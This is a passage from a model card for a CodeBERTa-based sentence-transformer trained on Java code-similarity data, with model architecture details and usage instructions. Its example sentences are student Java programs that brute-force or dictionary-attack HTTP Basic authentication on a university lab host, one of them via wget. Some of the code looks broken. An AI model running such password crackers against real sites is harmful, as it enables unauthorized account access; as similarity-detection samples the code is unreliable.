\n\t\tString record = null;\n\n\n\n String url = \"http://sec-crack.cs.rmit.edu./SEC/2/\"\
;\n\n\t\tchar pass[] = {'x','x','x'};\n\t\tint count=1;\n\t\tString passwd=new\
\ String();\n HttpURLConnection connection = null;\n URL u = null;\n\
\n try\n {\n u = new URL(url);\n\n }\n catch\
\ (MalformedURLException e)\n {\n }\n\n for(int a=0;a<words.length;a++)\n\
\ {\n for(int b=0;b<words.length;b++)\n {\n\
\ for(int c=0;c<words.length;c++)\n \
\ {\n pass[0]=words[a];\n \
\ pass[1]=words[b];\n pass[2]=words[c];\n\
\ passwd=passwd.copyValueOf(pass,0,3);\n \
\ System.out.println(count+ \" ) \" + passwd);\n \
\ count++;\n try\n\
\ {\n\n \
\ connection = (HttpURLConnection) u.openConnection();\n \
\ Authenticator.setDefault(new customAuthenticator(passwd));\n\
\n if (connection.getResponseCode()!=401)\n\
\ {\n \
\ System.out.print(\"The password is : \"+passwd);\n \
\ System.out.println();\n \
\ java.util.Date d1 = java.util.Calendar.getInstance().getTime();\n\
\ System.out.println(d1.toString());\n\
\ System.out.println(\"\\ntime taken\
\ in seconds:\"+ (d1.getTime() - d.getTime())/1000+\"\\n\");\n\n \
\ System.exit(0);\n \
\ }\n else\n \
\ {\n }\n \
\ connection.disconnect();\n \
\ }\n catch (IOException e)\n \
\ {\n System.out.println(e);\n\
\ }\n }\n \
\ }\n }\n }\n\n\tpublic static void main(String[] args)\n\t{\n\n\n\
\t\tBruteForce = new BruteForce();\n\t}\n}"
- "\n\n\nimport org.apache.commons.httpclient.HttpClient;\nimport org.apache.commons.httpclient.UsernamePasswordCredentials;\n\
import org.apache.commons.httpclient.cookie.CookiePolicy;\nimport org.apache.commons.httpclient.methods.GetMethod;\n\
\n\n\n\npublic class BruteForce{\n\n static final String LOGON_SITE_HACKER\
\ = BruteForcePropertyHelper.getProperty(\"logonSite\");\n static final int\
\ LOGON_PORT_HACKER = Integer.valueOf(BruteForcePropertyHelper.getProperty(\"\
logonPort\")).intValue();\n\n static final int USE_PROXY_SERVER = Integer.valueOf(BruteForcePropertyHelper.getProperty(\"\
useProxyServer\")).intValue();\n static final int PROXY_PORT = Integer.valueOf(BruteForcePropertyHelper.getProperty(\"\
proxyPort\")).intValue();\n\n static final String PROXY_SERVER = BruteForcePropertyHelper.getProperty(\"\
proxyServer\");\n static final String PROXY_USENAME = BruteForcePropertyHelper.getProperty(\"\
proxyUserName\");\n static final String PROXY_PASSWORD = BruteForcePropertyHelper.getProperty(\"\
proxypassword\");\n\n static final String GET_METHOD_HACKER = BruteForcePropertyHelper.getProperty(\"\
getMethod\");\n static final int NUMBER_OF_GETS_BEFORE_RELEASE = Integer.valueOf(BruteForcePropertyHelper.getProperty(\"\
numberOfGetsBeforeReleaseConnection\")).intValue();\n\n static final String[]\
\ cValidChars\t = {\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\",\"i\",\"j\"\
,\"k\",\"l\",\"m\",\"n\",\"o\",\"p\",\"q\",\"r\",\"s\",\"t\",\"u\",\"v\",\"w\"\
,\"x\",\"y\",\"z\",\"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"H\",\"I\",\"J\"\
,\"K\",\"L\",\"M\",\"N\",\"O\",\"P\",\"Q\",\"R\",\"S\",\"T\",\"U\",\"V\",\"W\"\
,\"X\",\"Y\",\"Z\"};\n\n public BruteForce() {\n super();\n }\n\n\
\n\n\n public static void main (String[] args) throws Exception {\n\n\t\tString\t\
statusLine = \" \";\n\t\tint\t\tcount = 0;\n\t\tint\t\tfirstLetterIndex = 0;\n\
\t\tint\t\tsecondLetterIndex = 0;\n\t\tint\t\tthirdLetterIndex = 0;\n\t\tint\t\
\tdivValue = 0;\n\n\n\n\n\t\tString userName = \"\";\n\t\tString password = \"\
\";\n\n\n HttpClient client = new HttpClient();\n\n\t\t\n\n if (USE_PROXY_SERVER\
\ == 1) {\n \t\t\tclient.getHostConfiguration().setProxy(PROXY_SERVER, PROXY_PORT);\n\
\ \t\t\tclient.getState().setProxyCredentials(null, null, new UsernamePasswordCredentials(PROXY_USENAME,\
\ PROXY_PASSWORD));\n\n }\n\n client.getState().setCookiePolicy(CookiePolicy.COMPATIBILITY);\n\
\ client.getHostConfiguration().setHost(LOGON_SITE_HACKER, LOGON_PORT_HACKER,\
\ \"http\");\n GetMethod getMethod = new GetMethod(GET_METHOD_HACKER);\n\
\n\n\t\t\n\n\t\tcount = 0;\n\n\t\tfor (int f = 0; f < 52; f++) {\n\n\t\t\tfirstLetterIndex\
\ = f;\n\n\t\t\tpassword = cValidChars[firstLetterIndex];\n\t\t\tSystem.out.println(\"\
Count: \"+ count + \" First Index: \"+ firstLetterIndex+ \" password: \"+ password);\n\
\n\t client.getState().setCredentials(null, null, new UsernamePasswordCredentials(userName,\
\ password));\n\t client.executeMethod(getMethod);\n\t statusLine\
\ = getMethod.getStatusLine().toString();\n\n\n\t\t\tif (statusLine.compareTo(\"\
HTTP/1.1 200 OK\") == 0) {\n\t\t\t\tSystem.out.println(\"Found the user name and\
\ password for the site. The username is: \"+ userName+ \" and the password is:\
\ \"+ password);\n\t\t\t\tSystem.exit(0);\n\t\t\t}\n\t }\n\n\n\t\t\n\t\tcount\
\ = 0;\n\n\t\tfor (int g = 0; g < 52; g++) {\n\n\t\t\tfirstLetterIndex = g;\n\n\
\t\t\tfor (int h = 0; h < 52; h++) {\n\n\t\t\tsecondLetterIndex = h;\n\n\t\t\t\
password = cValidChars[firstLetterIndex]+ cValidChars[secondLetterIndex];\n\n\t\
\t\t\tSystem.out.println(\"Count: \"+ count+ \" First Index: \"+ firstLetterIndex+\
\ \" Second Index: \"+ secondLetterIndex+ cValidChars[firstLetterIndex]+ cValidChars[secondLetterIndex]+\
\ cValidChars[thirdLetterIndex]+ \" password: \"+ password);\n\n\t\t client.getState().setCredentials(null,\
\ null, new UsernamePasswordCredentials(userName, password));\n\n\t\t\t\t++count;\n\
\n\t\t\t\tdivValue = count % NUMBER_OF_GETS_BEFORE_RELEASE;\n\n\n\t\t\t\tif (divValue\
\ == 0) {\n\n\t\t\t\t\tSystem.out.println(\"Count: \"+ count+ \" Div Value: \"\
+ divValue + \" Releasing the connection and getting new one\");\n\t\t\t\t\tgetMethod.releaseConnection();\n\
\t\t\t\t\tgetMethod = null;\n\t\t\t\t\tgetMethod = new GetMethod(GET_METHOD_HACKER);\n\
\n\t\t\t\t}\n\n\t\t client.executeMethod(getMethod);\n\n\t\t statusLine\
\ = getMethod.getStatusLine().toString();\n\t\t\t\tSystem.out.println(\"Found\
\ the user name and password for the site. The username is: \"+ userName+ \" and\
\ the password is: \"+ password);\n\n\t\t\t\tif (statusLine.compareTo(\"HTTP/1.1\
\ 200 OK\") == 0) {\n\t\t\t\t\tSystem.out.println(\"Found the user name and password\
\ for the site. The username is: \"+ userName+ \" and the password is: \"+ password);\n\
\n\t\t\t\t\tSystem.exit(0);\n\t\t\t\t}\n\t\t }\n\n\t\t}\n\n\t\t\n\t\t\n\n\t\
\tgetMethod.releaseConnection();\n\t\tgetMethod = null;\n\t\tgetMethod = new GetMethod(GET_METHOD_HACKER);\n\
\n\t\tcount = 0;\n\t\tfor (int i = 0; i < 52; i++) {\n\n\t\t\tfirstLetterIndex\
\ = i;\n\n\t\t\tfor (int j = 0; j < 52; j++) {\n\n\t\t\t\tsecondLetterIndex =\
\ j;\n\n\t\t\t\tfor (int k = 0; k < 52; k++) {\n\n\t\t\t\t\tthirdLetterIndex =\
\ k;\n\n\t\t\t\t\tpassword = cValidChars[firstLetterIndex]+ cValidChars[secondLetterIndex]+\
\ cValidChars[thirdLetterIndex];\n\t\t\t\t\tSystem.out.println(\"Count: \"+ count+\
\ \" First Index: \"+ firstLetterIndex+ \" Second Index: \"+ secondLetterIndex+\
\ \" Third Index: \"+ thirdLetterIndex+ \" \"+ cValidChars[firstLetterIndex]+\
\ cValidChars[secondLetterIndex]+ cValidChars[thirdLetterIndex]+ \" password:\
\ \"+ password);\n\n\t\t\t client.getState().setCredentials(null, null,\
\ new UsernamePasswordCredentials(userName, password));\n\n\t\t\t\t\t++count;\n\
\n\t\t\t\t\tdivValue = count % NUMBER_OF_GETS_BEFORE_RELEASE;\n\n\n\t\t\t\t\t\
if (divValue == 0) {\n\n\t\t\t\t\t\tSystem.out.println(\"Count: \"+ count+ \"\
\ Div Value: \"+ divValue+ \" Releasing the connection and getting new one\");\n\
\t\t\t\t\t\tgetMethod.releaseConnection();\n\t\t\t\t\t\tgetMethod = null;\n\t\t\
\t\t\t\tgetMethod = new GetMethod(GET_METHOD_HACKER);\n\n\t\t\t\t\t}\n\n\t\t\t\
\ client.executeMethod(getMethod);\n\t\t\t statusLine = getMethod.getStatusLine().toString();\n\
\n\t\t\t\t\tif (statusLine.compareTo(\"HTTP/1.1 200 OK\") == 0) {\n\t\t\t\t\t\t\
System.out.println(\"Found the user name and password for the site. The username\
\ is: \"+ userName+ \" and the password is: \"+ password);\n\t\t\t\t\t\tSystem.exit(0);\n\
\t\t\t\t\t}\n\t\t\t }\n\t\t\t}\n\t\t}\n }\n}\n"
- "import java.net.*;\nimport java.io.*;\nimport java.util.*;\n\npublic class Dictionary\
\ {\n\n public static void main(String[] args) {\n new CrackAttempt();\n\
\ }\n}\n\nclass CrackAttempt {\n public CrackAttempt() {\n final int\
\ MAX_LENGTH = 3;\n boolean auth = false;\n Date = new Date();\n \
\ String file = \"/usr/share/lib/dict/words\";\n String word;\n char[]\
\ password = new char[MAX_LENGTH];\n String resource = \"http://sec-crack.cs.rmit.edu./SEC/2/\"\
;\n\n while (!auth) {\n \n BufferedReader in = null;\n \
\ try {\n \n in = new BufferedReader(new FileReader(file));\n\
\ while ((word = in.readLine()) != null && !auth) {\n \
\ try {\n if (word.length() <= MAX_LENGTH) {\n \
\ password = word.toCharArray();\n \n \
\ Authenticator.setDefault(new CrackAuth(password));\n \
\ URL url = new URL(resource);\n HttpURLConnection conn\
\ = (HttpURLConnection)url.openConnection();\n conn.setRequestMethod(\"\
HEAD\");\n if (conn.getResponseCode() == HttpURLConnection.HTTP_OK)\
\ {\n System.out.println(\"cracked with \" + new String(password));\n\
\ auth = true;\n }\n \
\ }\n } catch (Exception e) {\n System.out.println(\"\
\ was exception: \" + e.getMessage());\n }\n }\n\n \
\ \n } catch (FileNotFoundException fnfe) {\n System.out.println(\"\
File Not Found\");\n } catch (IOException ioe) {\n System.out.println(\"\
IOException\");\n } catch(Exception e) {\n e.printStackTrace();\n\
\ } finally {\n try {\n in.close();\n \
\ } catch (Exception e) {;}\n }\n\n\n }\n if (!auth) {\n\
\ System.out.println(\"Unable determine password\");\n } else {\n\
\ time = (new Date()).getTime() - start.getTime();\n System.out.println(\"\
it took \" + String.valueOf(time) + \" milliseconds crack the password\");\n\
\ }\n }\n}\n\nclass CrackAuth extends Authenticator {\n char[] password;\n\
\ public CrackAuth(char[] password) {\n this.password = password;\n }\n\
\n protected PasswordAuthentication getPasswordAuthentication()\n {\n \
\ String user = \"\";\n return new PasswordAuthentication(user, password);\n\
\ }\n}\n"
- source_sentence: "\n\nimport java.net.*;\nimport java.io.*;\n\npublic class Base64Encoder\n\
{\n private final static char base64Array [] = {\n 'A', 'B', 'C', 'D',\
\ 'E', 'F', 'G', 'H',\n 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P',\n \
\ 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X',\n 'Y', 'Z', 'a', 'b',\
\ 'c', 'd', 'e', 'f',\n 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n',\n \
\ 'o', 'p', 'q', 'r', 's', 't', 'u', 'v',\n 'w', 'x', 'y', 'z',\
\ '0', '1', '2', '3',\n '4', '5', '6', '7', '8', '9', '+', '/'\n \
\ };\n\n public static String encode (String string)\n {\n String encodedString\
\ = \"\";\n byte bytes [] = string.getBytes ();\n int i = 0;\n \
\ int pad = 0;\n while (i < bytes.length)\n {\n byte b1 = bytes\
\ [i++];\n byte b2;\n byte b3;\n if (i >= bytes.length)\n\
\ {\n b2 = 0;\n b3 = 0;\n pad = 2;\n\
\ }\n else\n {\n b2 = bytes [i++];\n \
\ if (i >= bytes.length)\n {\n b3 = 0;\n \
\ pad = 1;\n }\n else\n b3 = bytes\
\ [i++];\n }\n\n byte c1 = (byte)(b1 >> 2);\n byte c2\
\ = (byte)(((b1 & 0x3) << 4) | (b2 >> 4));\n byte c3 = (byte)(((b2 & 0xf)\
\ << 2) | (b3 >> 6));\n byte c4 = (byte)(b3 & 0x3f);\n encodedString\
\ += base64Array [c1];\n encodedString += base64Array [c2];\n \
\ switch (pad)\n {\n case 0:\n encodedString\
\ += base64Array [c3];\n encodedString += base64Array [c4];\n \
\ break;\n case 1:\n encodedString += base64Array\
\ [c3];\n encodedString += \"=\";\n break;\n \
\ case 2:\n encodedString += \"==\";\n break;\n\
\ }\n }\n return encodedString;\n }\n}\n"
sentences:
- "\nimport java.net.*; \nimport java.io.*; \npublic class BruteForce {\nprivate\
\ static String password=\" \"; \n\n \n public static void main(String[]\
\ args) {\n\t String Result=\"\"; \n\t if (args.length<1)\n\t\t\t {\n\t\t\t\
\ System.out.println(\"Error: Correct Format Filename, username e.g<>\"); \n\
\t\t\t\tSystem.exit(1);\t\n\t\t\t }\n\t\t\t BruteForce bruteForce1 = new BruteForce();\n\
\t\t\t Result=bruteForce1.Password(\"http://sec-crack.cs.rmit.edu./SEC/2/\",args[0]);\
\ \n\t\t\t System.out.println(\"The Password of \"+args[0]+\"is..\"+Result);\
\ \n\t\t\t \n\t\t }\n\n\n\n private String Password(String urlString,String\
\ username) \n { \n int cnt=0;\n \n t0 = System.currentTimeMillis(); \n for\
\ ( char ch = 'A'; ch <= 'z'; ch++ )\n { \n\t\t\t\t\t\t if (ch>'Z' && ch<'a')\n\
\t\t\t\t\t\t { \n\t\t\t\t\t\t ch='a'; \n\t\t\t\t\t\t } \n\t\t\t\t\n\t\t\t\t\
for ( char ch1 = 'A'; ch1 <= 'z'; ch1++ )\n\t\t\t\t { \n\t\t\t\t\t \n\t\t\t\
\t\t\tif (ch1>'Z' && ch1<'a')\n\t\t\t\t\t\t { \n\t\t\t\t\t\t ch1='a'; \n\t\t\
\t\t\t\t }\n\n\n\t\t\t\t\t for ( char ch2 = 'A'; ch2 <= 'z'; ch2++ )\n\t\t\t\
\t\t\t { \n\t\t\t\t\t\t\tif (ch2>'Z' && ch2<'a')\n\t\t\t\t\t\t { \n\t\t\t\t\t\t\
\ ch2='a'; \n\t\t\t\t\t\t }\n\t\t\t\t\t\t\tpassword=String.valueOf(ch)+String.valueOf(ch1)+String.valueOf(ch2);\n\
\t\t\t\t\t\t\t\tSystem.out.print(\"crackin...:\"); \n\t\t\t\t\t \tSystem.out.print(\"\
\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b\" ); \n\t\t\t\t\t\ttry\n\t\t\t\t\t\t{\n\t\t\t\
\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tURL url = new URL (urlString);\n\t\t\t\tString\
\ userPassword=username+\":\"+password; \n\n \n\t\t String encoding =\
\ new url.misc.BASE64Encoder().encode (userPassword.getBytes());\n\t\t\t URLConnection\
\ conc= url.openConnection(); \n\t\t\t\t\t conc.setRequestProperty (\"Authorization\"\
, \" \" + encoding);\t\t\t \n\t\t\t\t\t conc.connect(); \n\t\t\t\t\t\tcnt++;\n\
\t\t\t\t\t if (conc.getHeaderField(0).trim().equalsIgnoreCase(\"HTTP/1.1 200\
\ OK\"))\n\t\t\t\t\t\t {\n\t\t\t\t\t\t\t t1 = System.currentTimeMillis(); \n\t\
\t\t\t\t\t\t net=t1-t0; \n\t\t\t\t\t\t\tSystem.out.println(\"\
The Number of Attempts \"+cnt); \n\t\t\t\t\t\t\tSystem.out.println(\"Total Time\
\ Taken in secs\"+net/1000); \n\t\t\t\t\t\t\treturn password; \n\t\t\t\t\t\t\
}\n\t\t\t\t\t\n\t\t\t\t}\n\n\t\t \tcatch (Exception e )\n\t\t\t\t{\n\t\t\t\
\t e.printStackTrace(); \n\n\t\t\t\t}\n\n\t\t\t\n\t\t \n\t\t \n\t\t }\n\
\t\t \n\n\n\n \n \n\t } \n \n \n\t\
} \n return \"Password could not found\"; \n\n }\n\n\n}"
- "import java.net.*;\nimport java.io.*;\nimport java.*;\n\n public class BruteForce\
\ {\n\n URLConnection conn = null;\n private static boolean status = false;\n\
\n public static void main (String args[]){\n BruteForce a = new BruteForce();\n\
\ String[] inp = {\"http://sec-crack.cs.rmit.edu./SEC/2/index.php\",\n \
\ \t\t\t\t \"\",\n \t\t\t\t \"\"};\n int attempts = 0;\n exit:\n\
\ for (int i=0;i<pwdArray.length;i++) {\n\t\t for (int j=0;j<pwdArray.length;j++)\
\ {\n\t\t\t for (int k=0;k<pwdArray.length;k++) {\n\t\t\t\t if (pwdArray[i] ==\
\ ' ' && pwdArray[j] != ' ') continue;\n\t\t\t\t if (pwdArray[j] == ' ' && pwdArray[k]\
\ != ' ') continue;\n\t\t\t\t inp[2] = inp[2] + pwdArray[i] + pwdArray[j] + pwdArray[k];\n\
\t\t\t\t attempts++;\n \t\t\t a.doit(inp);\n \n \t\t\t\t if (status) {\n\
\t\t\t\t\t System.out.println(\"Crrect password is: \" + inp[2]);\n\t\t\t\t\t\
\ System.out.println(\"Number of attempts = \" + attempts);\n\t\t\t\t\t break\
\ exit;\n\t\t\t \t }\n \t\t\t inp[2] = \"\";\n\t\t \t }\n\t \t }\n }\n\
\ }\n\n public void doit(String args[]) {\n \n try {\n BufferedReader\
\ in = new BufferedReader(\n new InputStreamReader\n (connectURL(new\
\ URL(args[0]), args[1], args[2])));\n String line;\n while ((line\
\ = in.readLine()) != null) {\n System.out.println(line);\n \
\ status = true;\n }\n }\n catch (IOException e) {\n \n\
\ }\n }\n\n public InputStream connectURL (URL url, String uname,\
\ String pword)\n throws IOException {\n conn = url.openConnection();\n\
\ conn.setRequestProperty (\"Authorization\",\n userNamePasswordBase64(uname,pword));\n\
\ conn.connect ();\n return conn.getInputStream();\n }\n\n public\
\ String userNamePasswordBase64(String username, String password) {\n return\
\ \" \" + base64Encode (username + \":\" + password);\n }\n\n private final\
\ static char pwdArray [] = {\n\t 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h',\n\
\t 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p',\n\t 'q', 'r', 's', 't',\
\ 'u', 'v', 'w', 'x',\n\t 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F',\n\t \
\ 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N',\n\t 'O', 'P', 'Q', 'R',\
\ 'S', 'T', 'U', 'V',\n\t 'W', 'X', 'Y', 'Z', ' '\n };\n\n private final\
\ static char base64Array [] = {\n 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H',\n\
\ 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P',\n 'Q', 'R', 'S', 'T', 'U',\
\ 'V', 'W', 'X',\n 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f',\n 'g',\
\ 'h', 'i', 'j', 'k', 'l', 'm', 'n',\n 'o', 'p', 'q', 'r', 's', 't', 'u',\
\ 'v',\n 'w', 'x', 'y', 'z', '0', '1', '2', '3',\n '4', '5', '6',\
\ '7', '8', '9', '+', '/'\n };\n\n private static String base64Encode (String\
\ string) {\n String encodedString = \"\";\n byte bytes [] = string.getBytes\
\ ();\n int i = 0;\n int pad = 0;\n while (i < bytes.length) {\n \
\ byte b1 = bytes [i++];\n byte b2;\n byte b3;\n if (i\
\ >= bytes.length) {\n b2 = 0;\n b3 = 0;\n pad = 2;\n\
\ }\n else {\n b2 = bytes [i++];\n if (i >= bytes.length)\
\ {\n b3 = 0;\n pad = 1;\n }\n else\n\
\ b3 = bytes [i++];\n }\n byte c1 = (byte)(b1 >> 2);\n\
\ byte c2 = (byte)(((b1 & 0x3) << 4) | (b2 >> 4));\n byte c3 = (byte)(((b2\
\ & 0xf) << 2) | (b3 >> 6));\n byte c4 = (byte)(b3 & 0x3f);\n encodedString\
\ += base64Array [c1];\n encodedString += base64Array [c2];\n switch\
\ (pad) {\n case 0:\n encodedString += base64Array [c3];\n \
\ encodedString += base64Array [c4];\n break;\n case 1:\n\
\ encodedString += base64Array [c3];\n encodedString += \"=\"\
;\n break;\n case 2:\n encodedString += \"==\";\n \
\ break;\n }\n }\n return encodedString;\n }\n }\n\n"
- "\nimport java.io.*;\nimport java.awt.*;\nimport java.net.*;\n\npublic class BruteForce\n\
{\n\tpublic static void main (String[] args)\n\t{\n\t\tString pw = new String();\n\
\t\tpw = getPassword ();\n\t\tSystem.out.println(\"Password is: \"+pw);\n\t}\n\
\tpublic static String getPassword()\n\t{\n\t\tString passWord = new String();\n\
\t\tpassWord = \"AAA\";\n\t\tchar[] guess = passWord.toCharArray();\n\t\tProcess\
\ pro = null;\n\t\tRuntime runtime = Runtime.getRuntime();\n\t\tBufferedReader\
\ in = null;\n\t\tString str=null;\n\t\tboolean found = true;\n\n\t\tSystem.out.println(\"\
\ attacking.....\");\n\t\tfor (int i=65;i<=122 ;i++ )\n\t\t{\n\t\t\tguess[0]=(char)(i);\n\
\ for (int j=65;j<=122 ;j++ )\n\t\t\t{\n\t\t\t\tguess[1]=(char)(j);\n\
\ for (int k=65 ;k<=122 ;k++ )\n\t\t\t\t{\n\t\t\t\t\tguess[2]=(char)(k);\n\
\t\t\t\t\tpassWord = new String(guess);\n\t\t\t\t\tString cmd = \"wget --http-user=\
\ --http-passwd=\"+passWord +\" http://sec-crack.cs.rmit.edu./SEC/2/index.php\
\ \";\n\t\t\t\t\ttry\n\t\t\t\t\t{\n\t\t\t\t\t\tpro = runtime.exec(cmd);\n\n\t\t\
\t\t\t\tin = new BufferedReader(new InputStreamReader(pro.getErrorStream()));\n\
\t\t\t\t\t\tfound = true;\n\t\t\t\t\t\tif((str=in.readLine())!=null)\n\t\t\t\t\
\t\t{\n\t\t\t\t\t\t\twhile ((str=in.readLine())!=null)\n\t\t\t\t\t\t\t{\n\t\t\t\
\t\t\t\t\tif (str.endsWith(\"Required\"))\n\t\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t\
\tfound = false;\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tif (found\
\ == true)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\treturn passWord;\n\t\t\t\t\t\t\t\
}\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\tcatch (Exception exception)\n\t\t\t\t\
\t{\n\t\t\t\t\t exception.getMessage();\n\t\t\t\t\t}\n\t\t\t\t\tif(k==90)\n\
\t\t\t\t\t\tk=96;\n\t\t\t\t\truntime.gc();\n\t\t\t\t}\n\t\t\t\tif(j==90)\n\t\t\
\t\t\tj=96;\n\t\t\t}\n\t\t\tif(i==90)\n\t\t\t\ti=96;\n\t\t}\n\t\treturn \"not\
\ found\";\n\t}\n}"
datasets:
- buelfhood/SOCO_TRAIN_java
pipeline_tag: sentence-similarity
library_name: sentence-transformers
---
# SentenceTransformer based on huggingface/CodeBERTa-small-v1
This is a [sentence-transformers](https://www.SBERT.net) model finetuned from [huggingface/CodeBERTa-small-v1](https://huggingface.co/huggingface/CodeBERTa-small-v1) on the [soco_train_java](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java) dataset. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
## Model Details
### Model Description
- **Model Type:** Sentence Transformer
- **Base model:** [huggingface/CodeBERTa-small-v1](https://huggingface.co/huggingface/CodeBERTa-small-v1) <!-- at revision e93b5898cff07f03f1c1c09cde284d1b85962363 -->
- **Maximum Sequence Length:** 512 tokens
- **Output Dimensionality:** 768 dimensions
- **Similarity Function:** Cosine Similarity
- **Training Dataset:**
- [soco_train_java](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java)
<!-- - **Language:** Unknown -->
<!-- - **License:** Unknown -->
### Model Sources
- **Documentation:** [Sentence Transformers Documentation](https://sbert.net)
- **Repository:** [Sentence Transformers on GitHub](https://github.com/UKPLab/sentence-transformers)
- **Hugging Face:** [Sentence Transformers on Hugging Face](https://huggingface.co/models?library=sentence-transformers)
### Full Model Architecture
```
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False, 'architecture': 'RobertaModel'})
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
```
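
The `Pooling` module above applies mean pooling (`pooling_mode_mean_tokens=True`): the token embeddings produced by the Transformer are averaged, with padding positions excluded via the attention mask. As an illustrative, dependency-free sketch of that step (not the library's implementation):

```python
# Illustrative sketch of mean pooling (pooling_mode_mean_tokens=True):
# average the per-token embeddings, skipping padding positions via the mask.
def mean_pool(token_embeddings, attention_mask):
    dim = len(token_embeddings[0])
    summed = [0.0] * dim
    count = 0
    for vec, keep in zip(token_embeddings, attention_mask):
        if keep:
            count += 1
            for i, v in enumerate(vec):
                summed[i] += v
    return [s / max(count, 1) for s in summed]

tokens = [[1.0, 2.0], [3.0, 4.0], [0.0, 0.0]]  # last position is padding
mask = [1, 1, 0]
print(mean_pool(tokens, mask))  # -> [2.0, 3.0]
```

In the real model this runs over 768-dimensional token embeddings, producing the 768-dimensional sentence vector.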
## Usage
### Direct Usage (Sentence Transformers)
First install the Sentence Transformers library:
```bash
pip install -U sentence-transformers
```
Then you can load this model and run inference.
```python
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/SOCO-Java-codeberta-cmnrl-triplets-ep1-bs256-lr5e-05-split0.2")
# Run inference
sentences = [
'\n\nimport java.net.*;\nimport java.io.*;\n\npublic class Base64Encoder\n{\n private final static char base64Array [] = {\n \'A\', \'B\', \'C\', \'D\', \'E\', \'F\', \'G\', \'H\',\n \'I\', \'J\', \'K\', \'L\', \'M\', \'N\', \'O\', \'P\',\n \'Q\', \'R\', \'S\', \'T\', \'U\', \'V\', \'W\', \'X\',\n \'Y\', \'Z\', \'a\', \'b\', \'c\', \'d\', \'e\', \'f\',\n \'g\', \'h\', \'i\', \'j\', \'k\', \'l\', \'m\', \'n\',\n \'o\', \'p\', \'q\', \'r\', \'s\', \'t\', \'u\', \'v\',\n \'w\', \'x\', \'y\', \'z\', \'0\', \'1\', \'2\', \'3\',\n \'4\', \'5\', \'6\', \'7\', \'8\', \'9\', \'+\', \'/\'\n };\n\n public static String encode (String string)\n {\n String encodedString = "";\n byte bytes [] = string.getBytes ();\n int i = 0;\n int pad = 0;\n while (i < bytes.length)\n {\n byte b1 = bytes [i++];\n byte b2;\n byte b3;\n if (i >= bytes.length)\n {\n b2 = 0;\n b3 = 0;\n pad = 2;\n }\n else\n {\n b2 = bytes [i++];\n if (i >= bytes.length)\n {\n b3 = 0;\n pad = 1;\n }\n else\n b3 = bytes [i++];\n }\n\n byte c1 = (byte)(b1 >> 2);\n byte c2 = (byte)(((b1 & 0x3) << 4) | (b2 >> 4));\n byte c3 = (byte)(((b2 & 0xf) << 2) | (b3 >> 6));\n byte c4 = (byte)(b3 & 0x3f);\n encodedString += base64Array [c1];\n encodedString += base64Array [c2];\n switch (pad)\n {\n case 0:\n encodedString += base64Array [c3];\n encodedString += base64Array [c4];\n break;\n case 1:\n encodedString += base64Array [c3];\n encodedString += "=";\n break;\n case 2:\n encodedString += "==";\n break;\n }\n }\n return encodedString;\n }\n}\n',
    'import java.net.*;\nimport java.io.*;\nimport java.*;\n\n public class BruteForce {\n\n URLConnection conn = null;\n private static boolean status = false;\n\n public static void main (String args[]){\n BruteForce a = new BruteForce();\n String[] inp = {"http://sec-crack.cs.rmit.edu./SEC/2/index.php",\n \t\t\t\t "",\n \t\t\t\t ""};\n int attempts = 0;\n exit:\n for (int i=0;i<pwdArray.length;i++) {\n\t\t for (int j=0;j<pwdArray.length;j++) {\n\t\t\t for (int k=0;k<pwdArray.length;k++) {\n\t\t\t\t if (pwdArray[i] == \' \' && pwdArray[j] != \' \') continue;\n\t\t\t\t if (pwdArray[j] == \' \' && pwdArray[k] != \' \') continue;\n\t\t\t\t inp[2] = inp[2] + pwdArray[i] + pwdArray[j] + pwdArray[k];\n\t\t\t\t attempts++;\n \t\t\t a.doit(inp);\n \n \t\t\t\t if (status) {\n\t\t\t\t\t System.out.println("Crrect password is: " + inp[2]);\n\t\t\t\t\t System.out.println("Number of attempts = " + attempts);\n\t\t\t\t\t break exit;\n\t\t\t \t }\n \t\t\t inp[2] = "";\n\t\t \t }\n\t \t }\n }\n }\n\n public void doit(String args[]) {\n \n try {\n BufferedReader in = new BufferedReader(\n new InputStreamReader\n (connectURL(new URL(args[0]), args[1], args[2])));\n String line;\n while ((line = in.readLine()) != null) {\n System.out.println(line);\n status = true;\n }\n }\n catch (IOException e) {\n \n }\n }\n\n public InputStream connectURL (URL url, String uname, String pword)\n throws IOException {\n conn = url.openConnection();\n conn.setRequestProperty ("Authorization",\n userNamePasswordBase64(uname,pword));\n conn.connect ();\n return conn.getInputStream();\n }\n\n public String userNamePasswordBase64(String username, String password) {\n return " " + base64Encode (username + ":" + password);\n }\n\n private final static char pwdArray [] = {\n\t \'a\', \'b\', \'c\', \'d\', \'e\', \'f\', \'g\', \'h\',\n\t \'i\', \'j\', \'k\', \'l\', \'m\', \'n\', \'o\', \'p\',\n\t \'q\', \'r\', \'s\', \'t\', \'u\', \'v\', \'w\', \'x\',\n\t 